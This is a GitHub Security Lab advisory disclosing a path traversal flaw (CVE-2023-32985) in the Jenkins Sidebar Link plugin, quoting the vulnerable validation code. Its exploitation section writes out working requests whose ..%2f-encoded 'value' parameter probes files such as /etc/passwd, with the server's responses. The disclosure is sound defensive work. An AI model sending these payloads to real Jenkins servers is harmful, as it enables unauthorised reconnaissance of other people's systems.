skip to content
Back to
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
May 25, 2023

GHSL-2023-076: Information disclosure in the Sidebar Link Plug-in for Jenkins - CVE-2023-32985

GitHub Security Lab

Coordinated Disclosure Timeline


Sidebar Link Plug-in for Jenkins 2.2.1 and earlier does not restrict a file path parameter in an HTTP endpoint, allowing authenticated attackers to enumerate arbitrary files on the Jenkins controller file system.


Sidebar Link Plug-in for Jenkins

Tested Version



Filesystem enumeration in (GHSL-2023-076)

The Sidebar Link Jenkins plugin implements an HTTP endpoint doCheckLinkIcon that receives a value parameter. This parameter is used to build a filesystem path in the Jenkins controller, and check for its existence:


public FormValidation doCheckLinkIcon(@QueryParameter String value) {
    if (StringUtils.isBlank(value)) {
        return FormValidation.warning("The provided icon is blank or empty. Default will be used.");
    } else
        // do not validate if default icon is used
        if (!value.equals(LinkAction.DEFAULT_ICON_NAME)) {
          FilePath imageFile = Jenkins.get().getRootPath().child(value);
          try {
              if (!imageFile.exists()) {
                  return FormValidation.error("Image does not exist:  " + imageFile);
          } catch (Exception e) {
              return FormValidation.error(e, "Problem with link icon:  " + value);
    return FormValidation.ok();

Since there is no validation performed on the parameter, it can contain .. sequences to escape the intended Jenkins root path directory. The plugin shows a different message depending on the file existing or not, which allows attackers to enumerate the controller filesystem by sending multiple requests with different paths and filenames.


This issue may lead to information disclosure.


To exploit this issue, attackers could make GET requests to the checkLinkIcon endpoint containing the desired paths to be enumerated.

Example of a negative request: http://localhost:8080/jenkins/job/test/descriptorByName/hudson.plugins.sidebar_link.SidebarLinkPlugin/checkLinkIcon?value=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/b

Response: Image does not exist:  /etc/b

Example of a positive request: http://localhost:8080/jenkins/job/test/descriptorByName/hudson.plugins.sidebar_link.SidebarLinkPlugin/checkLinkIcon?value=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

Response: HTTP 200 OK




This issue was discovered and reported by CodeQL team member @atorralba (Tony Torralba).


You can contact the GHSL team at, please include a reference to GHSL-2023-076 in any communication regarding this issue.